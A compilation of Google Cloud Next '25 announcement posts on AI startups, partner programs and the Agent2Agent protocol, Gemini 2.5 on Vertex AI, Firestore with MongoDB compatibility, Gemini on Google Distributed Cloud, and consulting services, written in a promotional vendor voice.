AI research labs and model builders like Anthropic, Cohere, Magic, Mistral, and AI21 Labs are great examples. Anthropic has been using Google Cloud infrastructure to support model training and inference for several years. Google Cloud has also become an increasingly important route for organizations to access Anthropic’s models. In fact, more than 4,000 companies have started using Claude models via Vertex AI thus far.
This week at Google Cloud Next, we’re highlighting the progress that even more global startups are making toward building AI systems and applications that will create real value for people and businesses. We’ll share some of the new startups who have chosen Google Cloud as their key technology partner; new industry partnerships and resources to make it easier for early-stage startups to build and go to market on Google Cloud; new companies joining our global Accelerator programs; and more ways that startups are achieving success with Google Cloud.
aside_block
<ListValue: [StructValue([(‘title’, ‘Try Google Cloud for free’), (‘body’, <wagtail.rich_text.RichText object at 0x3ee15d6e5d00>), (‘btn_text’, ‘Get started for free’), (‘href’, ‘https://console.cloud.google.com/freetrial?redirectPath=/welcome’), (‘image’, None)])]>
Supporting more AI startups on Google Cloud
This week, we’re announcing an exciting group of startups who are launching new or expanded work with Google Cloud. These companies span a broad swath of use cases, products, and industries, including consumer apps used by millions of people, enterprise use cases like search and data analytics and storage, developer coding assistance, and solutions for unique vertical challenges. These include:
Augment Codeis running its AI coding assistant, which specializes in helping developers navigate and contribute to production-grade codebases, on Google Cloud and is using Anthropic’s Claude models through Vertex AI.
Autoscience, a startup building AI agents to aid in scientific research, is using Google Cloud infrastructure and resources through our Startup Program as it begins to build and market its products.
Anysphere, the startup behind the AI-powered code editor Cursor, is now using Anthropic’s Claude models on Google Cloud to scale its AI coding assistant to more developers.
Big Sur AI now offers its AI-powered platform for retail and e-commerce customers on Google Cloud Marketplace.
Captions recently released its integration with Veo 2, making it easy for users to add B-roll content to the startup’s talking videos.
Eon.io, a startup focused on enterprise backup and recovery, has begun working with Google Cloud through our partnership with Lightspeed Capital; it’s now adding new AI search capabilities to its platform.
Features & Labels is a generative media platform for developers, accelerating the inference of gen AI models to improve the speed in which content is generated. The Fal team is working with Google Cloud to leverage its Veo 2 technology to help its users create videos with realistic motion and high-quality output.
Hebbiahas integrated Gemini models into its Matrix platform, which helps organizations build AI agents capable of working across all of their data.
Magic, which is building frontier-scale models capable of understanding very large codebases, is growing its use of GPUs on Google Cloud as it accelerates research and model training.
Photoroom, a French startup that provides gen AI photo-editing and design capabilities to consumers and businesses, has used Veo 2 and Imagen 3 to improve the quality of its offering and accelerate its development.
Physical Intelligence recently partnered with Google Cloud to support model development, using our secure and scalable AI infrastructure.
Spot AI is a video AI startup that transforms passive security cameras into AI Agents for improving security, safety, and operations in industries like manufacturing, retail, hospitals, construction and more. They’re using Google Cloud to power their new interface for building custom video AI agents, called Iris.
Storyis working with Google Cloud’s web3 services and infrastructure to bring new capabilities to developers on its platform.
Studyhall AI, which graduated from our UK Growth Accelerator program,has built a mobile application that uses Gemini models to help coach students on reading, writing, and exam prep.
Safe Superintelligence is partnering with Google Cloud to use TPUs to accelerate its research and development efforts toward building a safe, superintelligent AI.
Synthesia, a startup that operates an AI video platform, is using Google Cloud to build the next generation of advanced AI models that replicate realistic human likenesses and voice; the startup is also using Gemini models to handle complex vision and language-based tasks with speed and accuracy.
Ubie, a healthcare-focused startup founded in Japan, is using Gemini models via Google Cloud to power its physician assistance tool.
Udiois using TPUs to help train its models for music generation and serve its rapidly growing customer base.
Ufoniahelps physicians deliver care by using AI to automate clinical consultations with patients. It is using Google Cloud’s full AI stack to power its platform, including infrastructure, models on Vertex AI Model Garden, BigQuery, and GKE.
Wagestream, a financial services startup, is using Gemini models to handle more than 80% of its internal customer inquiries, including questions about pay dates, balances, and more.
Wondercraft, an AI-powered content studio that helps users create engaging audio ads, podcasts and more, is leveraging Gemini models for some of its core functionalities and will soon release a Veo 2 integration.
New partnerships with accelerators and VCs
We’re also expanding our work with leading venture capital firms and accelerators, building on our existing relationships with firms like Sequoia and YCombinator. These partnerships help provide technology like TPUs and Gemini models to fast-growing startup companies who are building with AI.
Today, we’re announcing a significant new partnership with the leading venture capital firm Lightspeed, which will make it easier for Lightspeed-backed startups to access technology and resources through the Google for Startups Cloud Program.
This includes upwards of $150,000 in cloud credits for Lightspeed’s AI portfolio companies, on top of existing credits available to all qualified startups through the Google for Startups Cloud Program. These credits help ensure participating startups will have more reliable access to cloud infrastructure and AI technology as they scale.
Lightspeed portfolio companies have already been using Google Cloud infrastructure, AI, and data tools, including Augment, Contextual, Grafana, and Mistral.
New resources to help startups build and go to market more quickly
Today we’re announcing new resources through the Google for Startups Cloud Program that will help startups access our infrastructure and technology more quickly.
We are also announcing our Startup Perks program, which provides early stage startups with preferred access to solutions from our partners like Datadog, Elastic, ElevenLabs, GitLab, MongoDB, NVIDIA, Weights & Biases, and more. Exclusive discounts and benefits will be added on a regular basis, helping startups build and grow with the best of the Google Cloud ecosystem.
Additionally, Google for Startups Cloud Program members will receive an additional $10,000 in credits to use exclusively on Partner Models through Vertex AI Model Garden, so they can quickly start using both Gemini models and models from partners like Anthropic and Meta.
We’re proud that 97% of companies who join our Google for Startups Cloud Program choose to stay with Google Cloud after their program credits expire, underscoring the value that our products are providing.
New accelerator cohort companies
Google Cloud currently offers a series of Accelerator programs for startups around the world. Today, we’re announcing the Spring 2025 cohort of companies in Google for Startups Cloud AI Accelerator for startups based in North America:
Future of AI: Perspectives for Startups
This year, we also launched our first-ever “Future of AI: Perspectives for Startups 2025” report. To gain a deeper understanding of where AI is headed, we gathered perspectives from 23 industry leaders and investors on their expectations for AI and what it means for startups in 2025 and beyond.
These experts weighed in on topics like the role of AI agents, the future of AI infrastructure, the areas startup investors are prioritizing, and much more. I encourage anyone involved in or interested in the AI startup world to take a look.
It’s this kind of fresh thinking and new technology that’s making Google Cloud a home for the startup community, and AI startups in particular — and we see Next ‘25 as an important extension of this growing ecosystem. With more that 60% of gen AI startups building on our platform today, we want to be a key partner for their innovation. This commitment to startups is ongoing, and will continue to grow with new resources, accelerators, and other programs that help them build and scale their businesses. Please be sure to visit the Startup Hub on the Mandalay Bay Expo Floor at Next ‘25 to learn more.
Since the beginning, partners have been core to Google Cloud — and that’s been especially true in the AI era. I’m amazed at the ways they have helped bring both Google’s AI innovations and their own incredible AI products and services to customers. Partners have already built more than 1,000 AI agent use cases for customers across nearly every industry.
The AI opportunity for Google Cloud partners is growing fast. For example, a new study from IDC1 found that global systems integrators will grow their Google Cloud AI practices as much as 100% this year — and almost half of their Google Cloud AI projects have already moved into widespread production thanks to initial ROI that customers are seeing. It’s clear that much of the opportunity ahead lies in agentic AI — and now, partners are infused at every layer of our AI agent stack.
This week at Google Cloud Next, we’re announcing updates that will help our partners build AI agents, power them with enterprise data and a choice of models, and bring them to customers, including through a new AI Agent Marketplace. We’re also launching a new open protocol, with support from more than 50 of the industry’s leading enterprise technology companies, which will allow AI agents to securely communicate in order to successfully complete tasks. And we’re enhancing the ways we go to market together, offering new incentives and resources for co-selling and training, as well as new AI offerings in Workspace for resellers.
We’re committed to helping all of our partners capitalize on the AI opportunity, whether they’re building new technology, integrating with our products, or delivering critical enterprise services.
aside_block
<ListValue: [StructValue([(‘title’, ‘Try Google Cloud for free’), (‘body’, <wagtail.rich_text.RichText object at 0x3ee15a0e41f0>), (‘btn_text’, ‘Get started for free’), (‘href’, ‘https://console.cloud.google.com/freetrial?redirectPath=/welcome’), (‘image’, None)])]>
Integrating our partners at every layer of the agentic AI stack
We’ve always taken an open approach to AI, and the same is true for agentic AI. With updates this week at Next ‘25, we’re now infusing partners at every layer of our agentic AI stack to enable multi-agent ecosystems. Here’s a closer look:
Agent2Agent (A2A) protocol: Today, we’re launching a new open protocol, with support and contributions from our partners, that will allow AI agents to communicate with each other, securely exchange information, and coordinate actions across various enterprise platforms or services like Atlassian, Box, Cohere, Intuit, Langchain, MongoDB, PayPal, Salesforce, SAP, ServiceNow, UKG and Workday. We believe the A2A framework will add significant value for customers, whose AI agents will now be able to work across their entire enterprise application estates. More partners can begin building with the A2A framework today and can learn more in our technical blog here.
AI Agent Marketplace: We’re also launching a new AI Agent Marketplace — a dedicated sectionwithin Google Cloud Marketplace that will easily allow customers to browse, purchase, and manage AI agents built by our partners. Today, partners like Accenture, BigCommerce, Deloitte Elastic, UiPath, Typeface, and VMware are offering agents through our AI Agent Marketplace, with additional agents launching soon from partners like Cognizant, Slalom, and Wipro.
Power agents with all your enterprise data: Data and AI models underpin all AI agents, and our open platform and agentic AI tooling make it possible for customers to train and fine-tune agents on their entire data estates. Today, we partner with companies like NetApp, Oracle, SAP, Salesforce, and ServiceNow — meaning customers with data stored in these popular platforms can now put this data to work to improve their AI agents.
Expert AI services: Our ecosystem of services partners — including Accenture, BCG, Capgemini, Cognizant, Deloitte, HCLTech, Infosys, KPMG, McKinsey, PwC, TCS, and Wipro — have actively contributed to the A2A protocol and will support its implementation. They’ve also significantly expanded their Google Cloud practices with new experts and technical resources over the past year. This means our customers now have access to a global community of highly-trained AI experts who can help them develop AI agent use cases and strategies with interoperability in mind; prototype new applications; train and manage AI models; and ultimately deploy AI agents across their businesses.
Simplifying the ways we help partners go to market
Across the board, for all types of partners, Google Cloud is increasing resources to help them address customer demand for AI and cloud implementation services — and to better help partners identify the largest, most strategic opportunities to grow their businesses. This includes a 2X increase in funding for AI opportunities over the past year alone, and builds on our existing, nine-figure investment in partner learning that we’ve made over the past four years.
In addition, we are continuing to refine the way we go-to-market with partners, to ensure partners have access to the right opportunities, and customers have access to the best possible technology and expertise. This includes:
Better field alignment and co-sell: Google Cloud has been co-selling with partners since our inception. Now, we’re introducing new processes to better capture and share partners’ critical contributions with our sales team. This includes increased visibility into the highly valuable co-selling activities like workshops, assessments, and proofs-of-concept, as well as partner-delivered services for migrations, application modernization, and other managed services. Ultimately, this information will better enable our sales team to connect customers with the correct ISV and services partners.
More partner earnings: We are continuing to evolve our incentives that help partners capitalize on the biggest opportunities, such as a 2x increase in partner funding for AI opportunities over the past year. We’re also introducing new AI-powered capabilities in Earnings Hub, our destination for tracking incentives and growth, which will enable partners to benchmark performance against peers, receive personalized tips on how to boost earnings, and more.
Supporting partner readiness: In the past four years, we’ve invested more than $100 million in partner training, and we are continuing to expand these efforts to help our ecosystem develop expertise in critical areas like Google Agentspace, Workspace, and more.
Making Google Workspace the best AI productivity platform for partners
More than 3 billion users and over 11 million paying customers rely on Google Workspace. Now, new enterprise-grade AI capabilities with Gemini are helping users get work done more quickly in tools like Gmail, Meet, Docs, and more. Our partners play a critical role in helping organizations around the world deploy Workspace, including providing critical migration support and training for organizations big and small around the world.
This week at Next, we’re announcing new AI innovations in Workspace, including proactive analysis and visualization capabilities in Sheets, audio generation in Docs, a new way to automate work with AI agents in the loop, and more—all of which will make Workspace an even more attractive platform for customers and ensure partners are going to market with category-defining products. In addition, we’ve increased partner funding for Workspace opportunities by 4x over the past year, to ensure partners have the right resources and incentives to bring Workspace to customers.
With simplified pricing, an enhanced Gemini-powered feature set, and the ability to integrate Workspace with customers’ existing tools like Slack, we’re creating new and exciting opportunities for partners to create long-term, strategic engagements by implementing Workspace for customers.
Announcing 2025 partner awards winners
In closing, we’re honored to spotlight this year’s winners of Google Cloud’s partner awards, which recognize the innovation and value that partners have created for customers—particularly with AI. Our ecosystem continues to evolve to meet the needs of businesses across industries, and we’re proud of the ways they have deployed Google Cloud’s technology to address complex challenges faced by our customers. To learn more about this year’s winners, please read the complete list.
I’m excited to meet with thousands of partners this week and share ideas for how we can work together to support customers, and how we can provide a simple, effective go-to-market motion with our ecosystem. See you at Next ‘25!
1. IDC InfoBrief, sponsored by Google Cloud, Google Cloud AI: Driving Opportunity and Growth for Global Consulting & Systems Integrator Partners, doc #US53276025, April 2025
We recently announced Gemini 2.5, our most intelligent AI model yet. Gemini 2.5 models are now thinking models, capable of reasoning before responding, resulting in dramatically improved performance. This transparent step-by-step reasoning is crucial for enterprise trust and compliance.
Our first model in this family, Gemini 2.5 Pro, available in public preview on Vertex AI, is now among the world’s best models for coding and tasks requiring advanced reasoning. It has state-of-the-art performance on a wide range of benchmarks, is recognized by many users as the most enterprise-ready reasoning model, and is at the top of the LM arena leaderboard by a significant margin.
Building on this momentum, we are launching Gemini 2.5 Flash, our workhorse model with low latency and cost efficiency on Vertex AI, our comprehensive platform for building and managing AI applications and agents, and Google AI Studio.
Let’s dive into how these capabilities are transforming AI development on Google Cloud.
aside_block
<ListValue: [StructValue([(‘title’, ‘$300 in free credit to try Google Cloud AI and ML’), (‘body’, <wagtail.rich_text.RichText object at 0x3ee15d25fe80>), (‘btn_text’, ‘Start building for free’), (‘href’, ‘http://console.cloud.google.com/freetrial?redirectPath=/vertex-ai/’), (‘image’, None)])]>
Advancing enterprise problem-solving with deep reasoning
Enterprises face challenges that require intricate information landscapes, multi-step analyses, and making nuanced decisions – tasks demanding that AI doesn’t just process, but also reasons. For these situations, we offer Gemini 2.5 Pro on Vertex AI, engineered for maximum quality and tackling the most complex tasks demanding deep reasoning and coding expertise. Coupled with a one million token context window, Gemini 2.5 Pro performs deep data analysis, extracts key insights from dense documents like legal contracts or medical records, and handles complex coding tasks by comprehending entire codebases.
“At Box, we’re redefining how enterprises apply intelligence to their content. With Box AI extract agents, powered by Gemini, users can instantly streamline tasks by making unstructured data actionable, as seen in millions of extractions supporting a variety of use cases, including procurement and reporting. Gemini 2.5 represents a leap forward in advanced reasoning, enabling us to envision building more powerful agent systems where extracted insights automatically trigger downstream actions and coordinate across multiple steps. This evolution pushes the boundaries of automation, allowing businesses to unlock and act upon their most valuable information with even greater impact and efficiency.” — Yashodha Bhavnani, VP of AI Product Management, Box
“Moody’s leverages Gemini’s advanced reasoning capabilities on Vertex AI within a model-agnostic framework. Our current production system uses Gemini 2.0 Flash for intelligent filtering and Gemini 1.5 Pro for high-precision extraction, achieving over 95% accuracy and an 80% reduction in processing time for complex PDFs. Building on this success, we are now in the early stages of testing Gemini 2.5 Pro. Its potential for deeper, structured reasoning across extensive document sets, thanks to features like its large context window, looks very promising for tackling even more complex data challenges and enhancing our data coverage further. While it’s not in production, the initial results are very encouraging.” — Wade Moss, Sr. Director, AI Data Solutions, Moody’s
To tailor Gemini for specific needs, businesses can soon leverage Vertex AI features like supervised tuning (for unique data specialization) and context caching (for efficient long context processing), enhancing performance and reducing costs. Both these features are launching in the coming weeks for Gemini 2.5 models.
Building responsive and efficient AI applications at scale
While Gemini 2.5 Pro targets peak quality for complex challenges, many enterprise applications prioritize speed, low latency, and cost-efficiency. To meet this need, we will soon offer Gemini 2.5 Flash on Vertex AI. This workhorse model is optimized specifically for low latency and reduced cost, delivering impressive and well-balanced quality for high-volume scenarios like customer service or real-time information processing. It’s the ideal engine for responsive virtual assistants and real-time summarization tools where efficiency at scale is key.
Gemini 2.5 Flash will also feature dynamic and controllable reasoning. The model automatically adjusts processing time (‘thinking budget’) based on query complexity, enabling faster answers for simple requests. You also gain granular control over this budget, allowing explicit tuning of the speed, accuracy, and cost balance for your specific needs. This flexibility is key to optimizing Flash performance in high-volume, cost-sensitive applications.
“Gemini 2.5 Flash’s enhanced reasoning ability, including its insightful responses, holds immense potential for Palo Alto Networks, including detection of future AI-powered threats and more effective customer support across our AI portfolio. We are focused on evaluating the latest model’s impact on AI-assistant performance, including its summaries and responses, with the intention of migrating to this model to unlock its advanced capabilities.” — Rajesh Bhagwat, VP of Engineering, Palo Alto Networks
Optimizing your experience on Vertex AI
Choosing between powerful models like Gemini 2.5 Pro and 2.5 Flash depends on your specific needs. To make it easier, we’re introducing Vertex AI Model Optimizer in experimental, to automatically generate the highest quality response for each prompt based on your desired balance of quality and cost. For customers who have workloads that do not require processing in a specific location, our Vertex AI Global Endpoint provides capacity-aware routing for our Gemini models across multiple regions, maintaining application responsiveness even during peak traffic or regional service fluctuations.
Powering the future with sophisticated agents and multi-agent ecosystems
Gemini 2.5 Pro’s advanced multimodal reasoning enables sophisticated, real-world agent workflows. It interprets visual context (maps, flowcharts), integrates text understanding, performs grounded actions like web searches, and synthesizes diverse information – allowing agents to interact meaningfully with complex inputs.
Building on this potential, today we are also announcing a number ofinnovations in Vertex AI to enable multi-agent ecosystems. One key innovation supporting dynamic, real-time interactions is the Live API for Gemini models. This API allows agents to process streaming audio, video, and text with low latency, enabling human-like conversations, participation in live meetings, or monitoring real-time situations (such as understanding spoken instructions mid-task).
Key Live API features further enhance these interactions: support for long, resumable sessions (greater than 30 minutes), multilingual audio output, time-stamped transcripts for analysis, dynamic instruction updates within sessions, and powerful tool integrations (search, code execution, function calling). These advancements pave the way for leveraging models like Gemini 2.5 Pro in highly interactive applications.
Get started
Ready to tackle complex problems, build efficient applications, and create sophisticated AI agents? Try Gemini 2.5 on Vertex AI now!
Today at Google Cloud Next, we’re thrilled to announce Firestore with MongoDB compatibility, built from the ground up by Google Cloud. It provides developers with an additional choice for their demanding document database workloads.
MongoDB compatibility has been a highly-requested capability from Firestore’s existing community of over 600,000 active developers. With this launch, Firestore developers can now take advantage of MongoDB’s API portability along with Firestore’s differentiated serverless service, to enjoy multi-region replication with strong consistency, virtually unlimited scalability, industry-leading high availability of up to 99.999% SLA, and single-digit milliseconds read performance.
When complemented with the ability to use their existing MongoDB application code, drivers, tools, in addition to the open-source ecosystem of MongoDB integrations, Firestore developers are able to quickly build applications for common use cases, including content management systems, e-commerce product catalogs, and user profiles.
Firestore with MongoDB compatibility also offers a customer-friendly serverless pricing model, with no up-front commitments required. Customers only pay for what they use without the hidden costs of capacity planning. You can learn more about how to get started at our Firestore with MongoDB compatibility site.
“After migrating to Firestore, we improved developer productivity by 55%, observed better service reliability, and have been able to seamlessly scale to over 250,000 requests per second and 30 billion documents. Because Firestore is completely serverless and provides virtually unlimited scalability, we no longer have to worry about managing our underlying database infrastructure — liberating us from database DevOps. This has enabled us to focus on product innovations that matter to our customers,” said Karan Agarwal, director of engineering, HighLevel.
aside_block
<ListValue: [StructValue([(‘title’, ‘$300 in free credit to try Google Cloud databases’), (‘body’, <wagtail.rich_text.RichText object at 0x3ee15d38baf0>), (‘btn_text’, ‘Start building for free’), (‘href’, ‘http://console.cloud.google.com/freetrial?redirectPath=/products?#databases’), (‘image’, None)])]>
Here’s how Firestore with MongoDB compatibility is different
Developers enjoy the agility of the popular MongoDB API and query language to store and query semi-structured Javascript Object Notation (JSON) data. With this announcement, we’re implementing the MongoDB API natively in the existing Firestore service, allowing developers to use their MongoDB drivers and integrations to read and write to Firestore with no application code changes. Developers can now build their applications, enjoying the best of the MongoDB ecosystem, and leveraging Firestore’s experience in designing and managing the most scalable and available serverless document database service.
Firestore utilizes disaggregated compute and storage layers that scale independently, in real-time. The Firestore compute layer implements multiple developer friendly APIs, including a Firestore with MongoDB compatibility API.
Benefits of Firestore with MongoDB compatibility:
1. Scale while maintaining performance, with zero intervention and downtime
At Firestore’s core is an intelligent, serverless document database service that serves some of the most demanding workloads in the world, powering more than 1.5 billion monthly active end-users. Firestore offers virtually unlimited horizontal scaling with zero customer intervention or downtime.
We’re able to do this through a differentiated backend that offers automatic, real-time rebalancing of disaggregated compute and storage that smooths out load across nodes. It allows us to add resources exactly where they are needed. We’re now able to bring the best of Google Cloud to the document databases ecosystem.
In this graph, Firestore is auto-scaling to handle a sudden database traffic spike of over 20,000 writes per second, while observing improved (lower) latency at scale.
2. Industry-leading availability
Firestore enables automatic, synchronous replication across different availability zones and regions. When any replica becomes unhealthy, Firestore will fail over to another replica with zero downtime and zero data loss. At the same time, it will apply automatic self-healing on the unhealthy replica. Unhealthy replicas will not affect processes such as automatic scaling.
Firestore handles regional and zonal failures with zero downtime and zero data loss, while applying automatic self-healing.
Firestore’s integration with Database Center simplifies database fleet management and is connected with Gemini Cloud Assist’s database improvement recommendations.
4. Transparent, simple pricing
Firestore makes keeping costs in check easier than ever. Pricing is transparent, predictable and simple. For read and write operations conducted on the database, customers simply pay for the actual operations conducted, based on the size of documents and index entries in 4 kilobyte chunks for reads and 1 kilobyte chunks for writes.
There are no upfront fees or hidden costs due to challenging cluster capacity planning, mismanaged cluster sharding, or I/O charges. Customers can also attain further discounts on the pricing on the operations conducted through one-year and three-year committed-use discounts. Storage is billed for actual storage consumed, and is inclusive of automatic data replication. Customers can explore examples of applied pricing here.
5. Maximize developer flexibility
Firestore offers developers more interface choices. Coming soon, we will also offer data interoperability between Firestore’s MongoDB compatible interface and Firestore’s innovative real-time and offline SDKs. This can allow developers to maximize existing libraries and tools from both of the MongoDB and Firestore developer communities.
Supercharge your applications with Firestore’s upcoming data interoperability, enabling you to utilize both MongoDB drivers and Firestore web & mobile SDKs on the same Firestore database.
Get started on Firestore with MongoDB compatibility
With this launch, Google Cloud is offering developers seeking a MongoDB interface multiple choices, including both MongoDB Atlas and Firestore. We’re thrilled to see what you’ll be able to achieve using Firestore with MongoDB compatibility. Firestore with MongoDB compatibility is available in preview as part of the new Firestore Enterprise edition. Get started today on Firestore with no upfront fees and a free tier.
Today we are announcing that Gemini will be available on Google Distributed Cloud (GDC), bringing Google’s most capable models to on-premises environments, with public preview starting in Q3 2025. To do so, we’ve partnered with NVIDIA to bring our Gemini models to NVIDIA Blackwell systems that you can purchase through Google or your preferred channels.
GDC is a fully managed on-prem and edge cloud solution that is offered in both connected and air-gapped options, scaling from a single server to hundreds of racks. It offers infrastructure-as-a-service, security, data, and AI services, and is extensible with a rich ISV ecosystem. GDC takes care of infrastructure management, making it easy for your developers to focus on leveraging the best that AI has to offer and build applications, assistants, and agents.
“NVIDIA and Google Distributed Cloud provide a secure AI platform, bringing Gemini models to enterprise datacenters and regulated industries. With NVIDIA Blackwell infrastructure and confidential computing, Google Distributed Cloud enhances privacy and security, and delivers industry-leading performance on DGX B200 and HGX B200 systems, available from Dell.” – Justin Boitano, VP, Enterprise AI Software, NVIDIA.
Historically, organizations that face strict regulatory, sovereignty, latency, or data volume issues have been unable to access the latest AI technology since they must keep their data on-premises. Their only options have been open-source models and tools. And, in most cases, they have to put together the software and hardware themselves, which increases operational burden and complexity. With Gemini on GDC, you don’t have to compromise between the best of AI and the need to keep your data on-premises.
Our GDC air-gapped product, which is now authorized for US Government Secret and Top Secret missions, and on which Gemini is available, provides the highest levels of security and compliance.
aside_block
<ListValue: [StructValue([(‘title’, ‘$300 in free credit to try Google Cloud AI and ML’), (‘body’, <wagtail.rich_text.RichText object at 0x3ee15d2a3550>), (‘btn_text’, ‘Start building for free’), (‘href’, ‘http://console.cloud.google.com/freetrial?redirectPath=/vertex-ai/’), (‘image’, None)])]>
Gemini on GDC: unlocking generative AI anywhere
Gemini models deliver breakthrough AI performance: they can analyze million-token contexts; are multimodal, i.e., can process diverse data formats such as text, image, audio and video; and operate globally across 100+ languages.
Further, the Gemini API offers AI inferencing without having to worry about infrastructure, OS management, or model lifecycle management. This enables you to:
Add your own business context: Use Retrieval Augment Generation (RAG) to personalize and augment the AI model’s output, eliminating the need for fine tuning or retraining the models.
Automate information processing and knowledge extraction: Improve employee efficiency by using gen AI to quickly summarize long documents, analyze sentiment in reports or feedback, or add captions to image, audio, and video content.
Create interactive conversational experiences: Build deeper customer relationships by enabling Gemini-powered customer support agents, chatbots via natural language, and employee assistants.
Tailor agents for your industry’s use case: Unlock highly specialized capabilities and workflows by developing tailored agents for everyone from financial advisors, to security assistants, to robotics.
“Gemini on Google Distributed Cloud will empower ServiceNow to augment powerful agentic AI capabilities such as reasoning in our existing systems via robust APIs. This strategic deployment allows us to explore and implement cutting-edge advancements while upholding our commitment to customer trust and data protection.” – Pat Casey, Chief Technology Officer & EVP of DevOps, ServiceNow
Vertex AI: one platform for cloud and on-prem
In addition to bringing Gemini to Google Distributed Cloud, customers today already benefit from the Vertex AI platform on GDC, which lets them accelerate the development, deployment, and management of agentic applications.
This complete AI platform offers:
Pre-trained APIs: Ready-to-use, task-optimized, pre-trained APIs based on advanced Google models for translation, speech-to-text, and optical character recognition (OCR). These APIs offer advanced features such as customizable glossaries and in-place document translation
Gen AI building tools: Open-source and third-party models with optimized inferencing on GKE, delivering fast startup and auto-scaling
Retrieval Augmented Generation (RAG): Grounding using Google Agentspace search and LLM API management and governance using Apigee on-prem
Built-in embeddings API and AlloyDB vector database: Powerful applications for personalization and recommendations, enabling improved user experiences
“With Google Distributed Cloud, Vertex AI, and Agentspace search, we will empower our Home Team innovators with a secure AI/ML platform and unified search, enabling the use of AI to enhance productivity and transform public safety for a safer and more secure future.” – Chee Wee Ang, Chief AI Officer, HTX
Google Agentspace: out-of-box access to on-prem data
Enterprises are eager to deploy gen AI, but they also struggle to connect large volumes of siloed information across various repositories and formats such as images, PDFs, and text. This hinders productivity and innovation. At the same time, building an in-house search solution is costly and requires access to scarce AI expertise.
We are excited to announce Google Agentspace search will be available on GDC, with public preview starting in Q3 2025. Google Agentspace search provides all enterprise knowledge workers with out-of-the-box capabilities that unify access to all your data in a secure, permissions-aware way.
Agentspace gives you access to:
Company-branded, multimodal search agent: A conversational search interface that can answer complex questions based on your company’s unique information, acting as a central source of enterprise truth for your entire organization
Pre-built enterprise data connectors: Connectors to index data from the most common on-prem enterprise systems (such as Confluence, Jira, ServiceNow, and Sharepoint)
Permissions-aware search results: Robust access control list (ACL) enforcement that help ensure that search results are permission-aware, maintaining security and compliance for all your on-prem data
Agentspace agents: Vertex AI is integrated out-of-the-box with Agentspace, starting with search agents, with more pre-built agents coming soon, and the ability to build your own
Get started with gen AI on GDC
We’re constantly innovating on GDC to be the leading gen AI and modern application development that you can deploy anywhere. To bring Gemini and gen AI to your premises, contact us at gdc-gemini@google.com or reach out to any of our accredited global partners.
Enterprise customers are coming to Google Cloud to transform their businesses with AI, and many are turning to our seasoned experts at Google Cloud Consulting to help implement these innovations.
Working alongside our many partners, Google Cloud Consulting teams are helping customers identify the right use cases for AI, deliver them safely and securely, and then generate strong ROI. In fact, engagements focused on implementing Google Cloud AI have become the fastest-growing area within our consulting practice over the past year — indicating the tremendous level of excitement around Google’s AI offerings.
This week at Google Cloud Next, we’re leaning into this success with the launch of several new offers, delivered by Google Cloud Consulting and our partners. These are all aimed at a simple, yet important goal: making it even easier for enterprises to capitalize on our entire portfolio of AI models, AI-optimized infrastructure, AI platforms, and agentic technologies.
We’re also expanding access to Delivery Navigator, a platform that offers a wide range of resources for teams working on cloud-based projects, including project plan templates, technical instructions, predictive insights, and smart recommendations.
And finally, to demonstrate the proven business impact of our work, we’re excited to showcase a pair of significant projects our team has completed with industry leaders: Airbus and Broadcom.
aside_block
<ListValue: [StructValue([(‘title’, ‘Try Google Cloud for free’), (‘body’, <wagtail.rich_text.RichText object at 0x3edb086586a0>), (‘btn_text’, ‘Get started for free’), (‘href’, ‘https://console.cloud.google.com/freetrial?redirectPath=/welcome’), (‘image’, None)])]>
Accelerate Your Transformation: New Service Offerings
To accelerate our customers’ digital transformations and streamline technology adoption, we’re introducing three new pre-packaged service offerings. These tailored offers provide a clear and proven path that can lead enterprises from concept to deployment, enabling them to rapidly adopt our technologies and avoid costly missteps. Each offering can be customized to meet your unique needs, ensuring an efficient and effective technology implementation journey.
New offers available this week:
Agentspace Accelerator provides a structured approach to connecting and deploying AI-powered search within organizations, so employees can easily gain access to relevant internal information and resources when they need it. As part of this service offer, our team of experts facilitate the secure integrationof enterprise data with Gemini’s advanced reasoning and Google-quality search, along with customizable add-ons for cloud setup, data preparation, and strategic enablement. The Agentspace Accelerator offering is the stepping stone for organizations to create their own AI-powered agents, agentic workflows, and more within a single unified platform.
Optimize with TPUs helps customers migrate workloads to our purpose-built AI chips, TPUs, so they can maximize the spend and performance of their AI inference and training. TPUs are designed to scale cost-efficiently across a variety of use cases, including chatbots, code generation, media content creation, synthetic speech, personalization models, and recommendation engines. Through a six-week engagement, Google Cloud experts will develop a custom backend wrapper around your existing AI Infrastructure, enabling you to easily shift workloads to TPUs while maintaining the flexibility to toggle to other chips as needed.
Oracle on Google Cloud empowers customers to fully leverage the benefits of our partnership with Oracle, combining Oracle databases and applications with Google Cloud’s advanced platform and AI capabilities for enhanced database and network performance. Through a tailored engagement, Google Cloud experts will assist in deploying and optimizing Oracle through a variety of modalities, such as bring-your-own-licenses with Google Kubernetes Engine or Oracle Cloud Infrastructure with Google Cross-Cloud Interconnect. This offering enables customers to improve database and network speed, while gaining streamlined access to Google Cloud’s AI and data tools to help simplify the creation of AI-powered applications.
Next up: The AI-enhanced Delivery Navigator platform
To further empower our customers’ cloud journeys, we’re excited to expand access to Delivery Navigator, a platform designed to bring efficiency and confidence to Google Cloud projects. Currently, our partners and consulting teams use Delivery Navigator to access proven delivery methodologies and best practices that help them guide migrations and technology implementations efficiently and safely.
Starting in October, we will begin to roll out Delivery Navigator to customers as well, available in preview. This means participating customers will have direct access to the same frameworks, tooling, tips, and best practices used by Google Cloud’s own teams.
Built around a conversational AI-chat interface, Delivery Navigator offers a wide range of resources for teams working on cloud-based projects, including project plan templates, detailed technical instructions with example code, and predictive insights and smart recommendations to help teams proactively address technical challenges. It covers many of the common variables encountered during solution implementation, as well as rarer hurdles, and there’s plenty of guidance on how to optimize Google Cloud deployments and accelerate time-to-value.
By providing access to the same advanced frameworks and AI enhancements used by our own experts, Delivery Navigator enables a smoother, faster, and more successful path to realizing the full value of Google Cloud.
Bringing Cloud and AI Projects to Life
Customers are already achieving remarkable outcomes with the support of Google Cloud Consulting experts and our partner ecosystem, and this week, we’re excited to share our work with enterprise customers like Airbus and Broadcom. While each customer’s needs differ, the common theme is that Google Cloud Consulting is helping enterprises implement Google Cloud technology and migrate workloads within complex IT environments – and doing so safely and securely.
Airbus’ IT landscape has been streamlined in Canada through a strategic migration, within a post-merger integration context, from on-prem servers to Google Cloud. This transformation provides Airbus with enhanced visibility and ownership of its complex IT infrastructure in Canada, enabling the company to modernize their systems with the migration of more than 500 systems.
Leveraging robust infrastructure and migration tools, a rapid and seamless migration of 2.5 petabytes of data was achieved by Airbus, with on-time completion. This revamped tech stack helps Airbus to support the increase of production rates in Canada and contributes to strengthening airline trust.
